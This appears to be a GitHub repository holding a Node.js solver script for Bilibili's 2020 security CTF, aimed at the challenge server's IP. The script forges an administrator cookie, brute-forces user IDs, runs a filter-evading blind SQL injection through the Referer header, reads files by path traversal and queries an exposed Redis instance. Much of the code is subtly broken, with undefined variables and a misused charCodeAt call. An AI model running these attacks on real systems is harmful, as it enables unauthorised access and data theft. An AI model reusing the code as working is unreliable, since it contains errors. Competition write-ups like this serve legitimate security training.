├── .gitignore ├── README.md ├── package.json ├── LICENSE └── index.js /.gitignore: -------------------------------------------------------------------------------- 1 | node_modules -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bilibili-sec2020-writeup 2 | 哔哩哔哩2020年度安全挑战赛 - Writeup 3 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "bilibili-sec2020-writeup", 3 | "version": "1.0.0", 4 | "description": "哔哩哔哩2020年度安全挑战赛 - Writeup", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [ 10 | "bilibili", 11 | "writeup", 12 | "web", 13 | "ctf", 14 | "sec" 15 | ], 16 | "author": "CNMathon ", 17 | "license": "MIT", 18 | "dependencies": { 19 | "redis": "^3.0.2", 20 | "request": "^2.88.2" 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 埋桑 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /index.js: -------------------------------------------------------------------------------- 1 | const request = require("request"); 2 | const redis = require("redis"); 3 | 4 | let session = ""; // 此处填写个人 session 5 | 6 | // 第一题 - 查源码 + 查请求 7 | const func1 = function () { 8 | const config = { 9 | url: "http://45.113.201.36/api/admin", 10 | headers: { 11 | "User-Agent": "bilibili Security Browser", 12 | Cookie: `session=${session}`, 13 | }, 14 | callback(error, response, body) { 15 | if (!error && response.statusCode == 200) { 16 | console.log("flag1:", body.data); 17 | } 18 | }, 19 | request() { 20 | request( 21 | { 22 | url: this.url, 23 | headers: this.headers, 24 | json: true, 25 | }, 26 | callback 27 | ); 28 | }, 29 | }; 30 | 31 | config.request(); 32 | }; 33 | 34 | // 第二题 - 修改UA 35 | const func2 = function () { 36 | const config = { 37 | url: "http://45.113.201.36/api/ctf/2", 38 | headers: { 39 | "User-Agent": "bilibili Security Browser", 40 | Cookie: `session=${session}`, 41 | }, 42 | callback(error, response, body) { 43 | if (!error && response.statusCode == 200) { 44 | console.log("flag2:", body.data); 45 | } 46 | }, 47 | request() { 48 | request( 49 | { 50 | url: this.url, 51 | headers: this.headers, 52 | json: true, 53 | }, 54 | callback 55 | ); 56 | }, 57 | }; 58 | 59 | config.request(); 60 | }; 61 | 62 | // 第三题 63 | const func3 = function () { 64 | const config = { 65 | url: "http://45.113.201.36/api/ctf/3", 66 | role: "ee11cbb19052e40b07aac0ca060c23ee", 67 | headers: { 68 | "User-Agent": "bilibili Security Browser", 69 | Cookie: `role=${this.role}; session=${session};`, 70 | }, 71 | callback(error, response, body) { 72 | if (!error && response.statusCode == 200) { 73 | console.log("flag3:", body.data); 74 | } 75 | }, 76 | request() { 77 | request.post( 78 | { 79 | url: this.url, 80 | headers: this.headers, 81 | json: true, 82 | }, 83 | callback 84 | ); 85 | }, 86 | }; 87 | 88 | config.request(); 89 | }; 90 | 91 | // 第四题 - 修改Cookie - role 92 | const func4 = function () { 93 | const config = { 94 | url: "http://45.113.201.36/api/ctf/4", 95 | role: "7b7bc2512ee1fedcd76bdc68926d4f7b", // 即 'Administrator' 的 MD5 字符串, 需要修改。 96 | headers: { 97 | "User-Agent": "bilibili Security Browser", 98 | Cookie: `role=${this.role}; session=${session};`, 99 | }, 100 | callback(error, response, body) { 101 | if (!error && response.statusCode == 200) { 102 | console.log("flag4:", body.data); 103 | } 104 | }, 105 | request() { 106 | request.post( 107 | { 108 | url: this.url, 109 | headers: this.headers, 110 | json: true, 111 | }, 112 | callback 113 | ); 114 | }, 115 | }; 116 | 117 | config.request(); 118 | }; 119 | 120 | // 第五题 - 暴力破解 121 | const func5 = function () { 122 | const config = { 123 | uid: 100336889, 124 | get url() { 125 | return `http://45.113.201.36/api/ctf/5?uid=${uid}`; 126 | }, 127 | role: "ee11cbb19052e40b07aac0ca060c23ee", 128 | headers: { 129 | "User-Agent": "bilibili Security Browser", 130 | Cookie: `role=${this.role}; session=${session};`, 131 | }, 132 | callback(error, response, body) { 133 | if (!error && response.statusCode == 200) { 134 | if (body.flag === undefined) { 135 | uid++; 136 | request.post( 137 | { 138 | url, 139 | headers, 140 | json: true, 141 | }, 142 | this.callback 143 | ); 144 | } else { 145 | console.log("flag5:", body.data); 146 | return; 147 | } 148 | } 149 | }, 150 | request() { 151 | request( 152 | { 153 | url: this.url, 154 | headers: this.headers, 155 | json: true, 156 | }, 157 | callback 158 | ); 159 | }, 160 | }; 161 | 162 | config.request(); 163 | }; 164 | 165 | // 第六题 - SQL注入 166 | const func6 = function () { 167 | const config = { 168 | url: "http://45.113.201.36/blog/single.php?id=1", 169 | flag: "", 170 | role: "ee11cbb19052e40b07aac0ca060c23ee", 171 | headers: { 172 | "User-Agent": "bilibili Security Browser", 173 | Cookie: `role=${this.role}; session=${session};`, 174 | }, 175 | callback(error, response, body) { 176 | if (!error && response.statusCode == 200) { 177 | console.log("flag4:", body.data); 178 | } 179 | }, 180 | request() { 181 | for (let i = 1; i <= 100; i++) { 182 | let left = 33; 183 | let right = 128; 184 | 185 | while (right - left != 1) { 186 | let mid = Math.floor((left + right) / 2); 187 | let payload = `0123'^if(substr((selselectect flag from flag),${i},1)>binary ${mid.toString( 188 | 16 189 | )},(selecselectt 1+~0),0) ununionion selecselectt 1,2#`; 190 | let headers = { 191 | Cookie: `role=${this.role}; session=${session};`, 192 | Referer: payload, 193 | }; 194 | let callback = function (error, response, body) { 195 | if (!error && response.statusCode == 200) { 196 | if (body.data.length == 5596) { 197 | left = mid; 198 | } else { 199 | right = mid; 200 | } 201 | } 202 | }; 203 | request( 204 | { 205 | url, 206 | headers, 207 | json: true, 208 | }, 209 | callback 210 | ); 211 | } 212 | flag = String.charCodeAt(right); 213 | } 214 | console.log("flag6:", flag); 215 | }, 216 | }; 217 | 218 | config.request(); 219 | }; 220 | 221 | // 第七题 - 任意文件读取 222 | const func7 = function () { 223 | const config = { 224 | url: "http://45.113.201.36/api/images?file=../../../flag7.txt", 225 | role: "7b7bc2512ee1fedcd76bdc68926d4f7b", 226 | headers: { 227 | "User-Agent": "bilibili Security Browser", 228 | Cookie: `role=${this.role}; session=${session};`, 229 | }, 230 | callback(error, response, body) { 231 | if (!error && response.statusCode == 200) { 232 | // 文件读取 233 | } 234 | }, 235 | request() { 236 | request( 237 | { 238 | url, 239 | headers, 240 | json: true, 241 | }, 242 | callback 243 | ); 244 | }, 245 | }; 246 | 247 | config.request(); 248 | }; 249 | 250 | // 第八题 - 查Redis 251 | const func8 = function () { 252 | const config = { 253 | get client() { 254 | return redis.createClient(6379, "45.113.201.36"); 255 | }, 256 | callback() { 257 | this.client.get("flag8", function (err, reply) { 258 | if (!err) { 259 | console.log(reply.toString()); 260 | } 261 | }); 262 | }, 263 | connect() { 264 | this.client.on("connect", callback); 265 | }, 266 | }; 267 | 268 | config.connect(); 269 | }; 270 | 271 | // 第九题 - 任意文件读取 + 密钥解密 272 | const func9 = function () { 273 | const config = { 274 | url: "http://45.113.201.36/api/images?file=../../../secret.txt", 275 | role: "ee11cbb19052e40b07aac0ca060c23ee", 276 | headers: { 277 | "User-Agent": "bilibili Security Browser", 278 | Cookie: `role=${this.role}; session=${this.session};`, 279 | }, 280 | callback(error, response, body) { 281 | if (!error && response.statusCode == 200) { 282 | // 得到加密字符串,该字符串解密后即为 flag 283 | } 284 | }, 285 | request() { 286 | request.post( 287 | { 288 | url: this.url, 289 | headers: this.headers, 290 | json: true, 291 | }, 292 | this.callback 293 | ); 294 | }, 295 | }; 296 | 297 | config.request(); 298 | }; 299 | 300 | // 第十题 - Meta Type 301 | const func10 = function () { 302 | const config = { 303 | url: "http://45.113.201.36/blog/end.php?id[]=&url=flag.txt", // dirsearch 后,得知存在 /blog/test.php,返回内容为 jsfuck 编码的 JS 代码,转义后为var str1 = "程序员最多的地方"; var str2 = "bilibili1024havefun"; console.log()。Github 上找到对应仓库后根据提示得到该URL。 304 | role: "ee11cbb19052e40b07aac0ca060c23ee", 305 | headers: { 306 | "User-Agent": "bilibili Security Browser", 307 | Cookie: `role=${this.role}; session=${session};`, 308 | }, 309 | callback(error, response, body) { 310 | if (!error && response.statusCode == 200) { 311 | // 得到加密字符串,该字符串解密后即为 flag 312 | } 313 | }, 314 | request() { 315 | request.post( 316 | { 317 | url: this.url, 318 | headers: this.headers, 319 | json: true, 320 | }, 321 | this.callback 322 | ); 323 | }, 324 | }; 325 | 326 | config.request(); 327 | }; 328 | 329 | func1(); 330 | func2(); 331 | func3(); 332 | func4(); 333 | func5(); 334 | func6(); 335 | func7(); 336 | func8(); 337 | func9(); 338 | func10(); 339 | --------------------------------------------------------------------------------